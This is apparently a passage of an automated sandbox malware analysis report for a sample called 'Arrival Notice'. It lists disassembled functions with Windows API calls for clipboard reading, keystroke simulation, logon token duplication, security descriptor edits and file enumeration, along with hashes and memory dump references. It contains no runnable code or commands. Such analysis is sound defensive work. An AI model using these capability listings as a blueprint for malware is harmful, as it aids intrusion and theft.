                  • Opcode ID: 8eddf01fa3c6c3a29a33ff09aeee534ffc52c4a4ed1ef0e269e827c8d188cd01
                  • Instruction ID: 4142dddbe8f2abdddf7d38843c9bbf0b0f3b89a7665409e7862b7f08c415c7f4
                  • Opcode Fuzzy Hash: 8eddf01fa3c6c3a29a33ff09aeee534ffc52c4a4ed1ef0e269e827c8d188cd01
                  • Instruction Fuzzy Hash: 49C09B352C0314BFF2154780FD4AF587754A348B00F044415F709555F3C3F11410D758
                  Function 003CFC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                  • Instruction ID: 2709430826b94f3e52772312029527651cd230ad3e18f5382d5818f8e9e41236
                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                  • Instruction Fuzzy Hash: E631E474A001099FC71ADF59D484E69FBA6FF49310B25C6A9E80ACB655D731EDC1CBC0
                  Function 035222A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                  Download Yara Rule
                  APIs
                  • Sleep.KERNELBASE(000001F4), ref: 035222B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1660528949.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3520000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                  • Instruction ID: 48d9d169d70ee2970a70688cfb5fdafc229c7187445c739fd1e48889a6194171
                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                  • Instruction Fuzzy Hash: D6E0E67594010EDFDB00EFB8D54969E7FB4FF04301F1005A1FD05D2290D6319D508A72

                  Non-executed Functions

                  Function 00449576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 003C9BB2
                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0044961A
                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0044965B
                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0044969F
                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004496C9
                  • SendMessageW.USER32 ref: 004496F2
                  • GetKeyState.USER32(00000011), ref: 0044978B
                  • GetKeyState.USER32(00000009), ref: 00449798
                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004497AE
                  • GetKeyState.USER32(00000010), ref: 004497B8
                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004497E9
                  • SendMessageW.USER32 ref: 00449810
                  • SendMessageW.USER32(?,00001030,?,00447E95), ref: 00449918
                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0044992E
                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00449941
                  • SetCapture.USER32(?), ref: 0044994A
                  • ClientToScreen.USER32(?,?), ref: 004499AF
                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 004499BC
                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004499D6
                  • ReleaseCapture.USER32 ref: 004499E1
                  • GetCursorPos.USER32(?), ref: 00449A19
                  • ScreenToClient.USER32(?,?), ref: 00449A26
                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00449A80
                  • SendMessageW.USER32 ref: 00449AAE
                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00449AEB
                  • SendMessageW.USER32 ref: 00449B1A
                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00449B3B
                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00449B4A
                  • GetCursorPos.USER32(?), ref: 00449B68
                  • ScreenToClient.USER32(?,?), ref: 00449B75
                  • GetParent.USER32(?), ref: 00449B93
                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00449BFA
                  • SendMessageW.USER32 ref: 00449C2B
                  • ClientToScreen.USER32(?,?), ref: 00449C84
                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00449CB4
                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00449CDE
                  • SendMessageW.USER32 ref: 00449D01
                  • ClientToScreen.USER32(?,?), ref: 00449D4E
                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00449D82
                    • Part of subcall function 003C9944: GetWindowLongW.USER32(?,000000EB), ref: 003C9952
                  • GetWindowLongW.USER32(?,000000F0), ref: 00449E05
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                  • String ID: @GUI_DRAGID$F$p#H
                  • API String ID: 3429851547-2467187759
                  • Opcode ID: e2c4b29eccb904c086da3cc8eace782eb01e5ef8383caf636d704636c6a85ce8
                  • Instruction ID: 82da44f5e9bf04558232d1a7ce4a2ede6629ad1e7a89bacef4062451d746aa13
                  • Opcode Fuzzy Hash: e2c4b29eccb904c086da3cc8eace782eb01e5ef8383caf636d704636c6a85ce8
                  • Instruction Fuzzy Hash: 8D429A74204201AFE721CF24CC85EABBBE5EF49310F154A2AF699872A1D735AC51EF49
                  Function 00444873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 004448F3
                  • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00444908
                  • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00444927
                  • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0044494B
                  • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0044495C
                  • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0044497B
                  • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 004449AE
                  • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 004449D4
                  • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00444A0F
                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00444A56
                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00444A7E
                  • IsMenu.USER32(?), ref: 00444A97
                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00444AF2
                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00444B20
                  • GetWindowLongW.USER32(?,000000F0), ref: 00444B94
                  • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00444BE3
                  • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00444C82
                  • wsprintfW.USER32 ref: 00444CAE
                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00444CC9
                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00444CF1
                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00444D13
                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00444D33
                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00444D5A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                  • String ID: %d/%02d/%02d
                  • API String ID: 4054740463-328681919
                  • Opcode ID: a90677cad1c29f2e5d729d5404a101d5cbb9fb0b5288621881e5518a92afb04d
                  • Instruction ID: f362856c109a747b0417e0abe74a8c0e69fa5bc91412ab3d5c0226637ed8ef0e
                  • Opcode Fuzzy Hash: a90677cad1c29f2e5d729d5404a101d5cbb9fb0b5288621881e5518a92afb04d
                  • Instruction Fuzzy Hash: 2112E071600214ABFB259F24CC49FAF7BF8EF85310F14412AF916EA2E1DB789941CB58
                  Function 003CF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                  Download Yara Rule
                  APIs
                  • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 003CF998
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040F474
                  • IsIconic.USER32(00000000), ref: 0040F47D
                  • ShowWindow.USER32(00000000,00000009), ref: 0040F48A
                  • SetForegroundWindow.USER32(00000000), ref: 0040F494
                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040F4AA
                  • GetCurrentThreadId.KERNEL32 ref: 0040F4B1
                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040F4BD
                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 0040F4CE
                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 0040F4D6
                  • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0040F4DE
                  • SetForegroundWindow.USER32(00000000), ref: 0040F4E1
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0040F4F6
                  • keybd_event.USER32(00000012,00000000), ref: 0040F501
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0040F50B
                  • keybd_event.USER32(00000012,00000000), ref: 0040F510
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0040F519
                  • keybd_event.USER32(00000012,00000000), ref: 0040F51E
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0040F528
                  • keybd_event.USER32(00000012,00000000), ref: 0040F52D
                  • SetForegroundWindow.USER32(00000000), ref: 0040F530
                  • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0040F557
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                  • String ID: Shell_TrayWnd
                  • API String ID: 4125248594-2988720461
                  • Opcode ID: d414bb194d77353bd45d476bfcf7d550b9389a5c36906a90a36136488ca1d1d5
                  • Instruction ID: 075979b92febc2242994b4523b53f190aa478b5b45d1d04242018c182ac9a0b3
                  • Opcode Fuzzy Hash: d414bb194d77353bd45d476bfcf7d550b9389a5c36906a90a36136488ca1d1d5
                  • Instruction Fuzzy Hash: B3316375A41228BBEB306BB55C8AFBF7E6CEB45B50F150036FA00F61D1C6B45D00AA69
                  Function 00411201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0041170D
                    • Part of subcall function 004116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0041173A
                    • Part of subcall function 004116C3: GetLastError.KERNEL32 ref: 0041174A
                  • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00411286
                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 004112A8
                  • CloseHandle.KERNEL32(?), ref: 004112B9
                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004112D1
                  • GetProcessWindowStation.USER32 ref: 004112EA
                  • SetProcessWindowStation.USER32(00000000), ref: 004112F4
                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00411310
                    • Part of subcall function 004110BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004111FC), ref: 004110D4
                    • Part of subcall function 004110BF: CloseHandle.KERNEL32(?,?,004111FC), ref: 004110E9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                  • String ID: $default$winsta0$ZG
                  • API String ID: 22674027-460506031
                  • Opcode ID: f86bcd8a73485e4849030686f4fa6fca456a7a149ca1fae0410cd3292873b608
                  • Instruction ID: fe5a101ffb5bd38c4c0431c04b6f00887eac7c3d5a969882764838f697957df1
                  • Opcode Fuzzy Hash: f86bcd8a73485e4849030686f4fa6fca456a7a149ca1fae0410cd3292873b608
                  • Instruction Fuzzy Hash: 6181B371900209AFDF119FA4DC49FEF7BB9EF05704F18412AFA10E62A0D7798984CB29
                  Function 00410B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004110F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00411114
                    • Part of subcall function 004110F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00410B9B,?,?,?), ref: 00411120
                    • Part of subcall function 004110F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00410B9B,?,?,?), ref: 0041112F
                    • Part of subcall function 004110F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00410B9B,?,?,?), ref: 00411136
                    • Part of subcall function 004110F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0041114D
                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00410BCC
                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00410C00
                  • GetLengthSid.ADVAPI32(?), ref: 00410C17
                  • GetAce.ADVAPI32(?,00000000,?), ref: 00410C51
                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00410C6D
                  • GetLengthSid.ADVAPI32(?), ref: 00410C84
                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00410C8C
                  • HeapAlloc.KERNEL32(00000000), ref: 00410C93
                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00410CB4
                  • CopySid.ADVAPI32(00000000), ref: 00410CBB
                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00410CEA
                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00410D0C
                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00410D1E
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410D45
                  • HeapFree.KERNEL32(00000000), ref: 00410D4C
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410D55
                  • HeapFree.KERNEL32(00000000), ref: 00410D5C
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410D65
                  • HeapFree.KERNEL32(00000000), ref: 00410D6C
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00410D78
                  • HeapFree.KERNEL32(00000000), ref: 00410D7F
                    • Part of subcall function 00411193: GetProcessHeap.KERNEL32(00000008,00410BB1,?,00000000,?,00410BB1,?), ref: 004111A1
                    • Part of subcall function 00411193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00410BB1,?), ref: 004111A8
                    • Part of subcall function 00411193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00410BB1,?), ref: 004111B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                  • String ID:
                  • API String ID: 4175595110-0
                  • Opcode ID: c2402458dfbc2bead8a552587e71a81cadd263c084dabd5387e6eeb9c0acf3b1
                  • Instruction ID: 5db205183cd3beb32c538a7d610ee70a8240144d86469231892f9513a23729e4
                  • Opcode Fuzzy Hash: c2402458dfbc2bead8a552587e71a81cadd263c084dabd5387e6eeb9c0acf3b1
                  • Instruction Fuzzy Hash: AD716F7590120AABDF10DFE4DD84BEFBBB8BF05300F044526E914A7251D7B9A985CF64
                  Function 0042EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                  Download Yara Rule
                  APIs
                  • OpenClipboard.USER32(0044CC08), ref: 0042EB29
                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0042EB37
                  • GetClipboardData.USER32(0000000D), ref: 0042EB43
                  • CloseClipboard.USER32 ref: 0042EB4F
                  • GlobalLock.KERNEL32(00000000), ref: 0042EB87
                  • CloseClipboard.USER32 ref: 0042EB91
                  • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0042EBBC
                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0042EBC9
                  • GetClipboardData.USER32(00000001), ref: 0042EBD1
                  • GlobalLock.KERNEL32(00000000), ref: 0042EBE2
                  • GlobalUnlock.KERNEL32(00000000,?), ref: 0042EC22
                  • IsClipboardFormatAvailable.USER32(0000000F), ref: 0042EC38
                  • GetClipboardData.USER32(0000000F), ref: 0042EC44
                  • GlobalLock.KERNEL32(00000000), ref: 0042EC55
                  • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0042EC77
                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0042EC94
                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0042ECD2
                  • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0042ECF3
                  • CountClipboardFormats.USER32 ref: 0042ED14
                  • CloseClipboard.USER32 ref: 0042ED59
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                  • String ID:
                  • API String ID: 420908878-0
                  • Opcode ID: 6218823773cf4568fac66e48d3da6d6dfb0414db60c7025f2f36194346505e00
                  • Instruction ID: f2e9727697eccac667a15369835d6da8ade05ba1585bb957ffe7379f34b2e28e
                  • Opcode Fuzzy Hash: 6218823773cf4568fac66e48d3da6d6dfb0414db60c7025f2f36194346505e00
                  • Instruction Fuzzy Hash: 1F6105342043029FD300EF21E884F6A7BE4AF85704F58446EF5468B2A2CB75ED05CB6A
                  Function 0042698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileW.KERNEL32(?,?), ref: 004269BE
                  • FindClose.KERNEL32(00000000), ref: 00426A12
                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00426A4E
                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00426A75
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00426AB2
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00426ADF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                  • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                  • API String ID: 3830820486-3289030164
                  • Opcode ID: f832ce2a46f0e7e138b3c63260e14d787a656621591fa299f6fb2f39dc43a96d
                  • Instruction ID: bfc3c58c6fcae487e83314eb0305049de0b75dc09a450045825b84d5683bdcab
                  • Opcode Fuzzy Hash: f832ce2a46f0e7e138b3c63260e14d787a656621591fa299f6fb2f39dc43a96d
                  • Instruction Fuzzy Hash: 93D16471508300AFC711EB64D886EABB7ECAF89704F44491EF689DB251EB74DA44CB62
                  Function 00429642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00429663
                  • GetFileAttributesW.KERNEL32(?), ref: 004296A1
                  • SetFileAttributesW.KERNEL32(?,?), ref: 004296BB
                  • FindNextFileW.KERNEL32(00000000,?), ref: 004296D3
                  • FindClose.KERNEL32(00000000), ref: 004296DE
                  • FindFirstFileW.KERNEL32(*.*,?), ref: 004296FA
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0042974A
                  • SetCurrentDirectoryW.KERNEL32(00476B7C), ref: 00429768
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00429772
                  • FindClose.KERNEL32(00000000), ref: 0042977F
                  • FindClose.KERNEL32(00000000), ref: 0042978F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                  • String ID: *.*
                  • API String ID: 1409584000-438819550
                  • Opcode ID: 98e8ab0b2f163abfd4a04ca4a14ecbfbd46758e8cca06c5afc52fb4f207a5d6f
                  • Instruction ID: 97e4743001bd377da7d69f66e10ef0ab60c766ccbf3716bb7faca6264634b3ea
                  • Opcode Fuzzy Hash: 98e8ab0b2f163abfd4a04ca4a14ecbfbd46758e8cca06c5afc52fb4f207a5d6f
                  • Instruction Fuzzy Hash: 0831F836601629ABDB10AFB4EC49ADF37ACAF4A320F5440A7F904E2190D778DD448A1C
                  Function 0042979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 004297BE
                  • FindNextFileW.KERNEL32(00000000,?), ref: 00429819
                  • FindClose.KERNEL32(00000000), ref: 00429824
                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00429840
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00429890
                  • SetCurrentDirectoryW.KERNEL32(00476B7C), ref: 004298AE
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 004298B8
                  • FindClose.KERNEL32(00000000), ref: 004298C5
                  • FindClose.KERNEL32(00000000), ref: 004298D5
                    • Part of subcall function 0041DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0041DB00
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                  • String ID: *.*
                  • API String ID: 2640511053-438819550
                  • Opcode ID: b5dad5691d5f52c543aa9a11a781cdd6e6af6ca10728de773929938c4bc4e33f
                  • Instruction ID: 4f855214df90bf1617a894b726f4a62019501af49d2ca0e76ba27f156e8cc8f8
                  • Opcode Fuzzy Hash: b5dad5691d5f52c543aa9a11a781cdd6e6af6ca10728de773929938c4bc4e33f
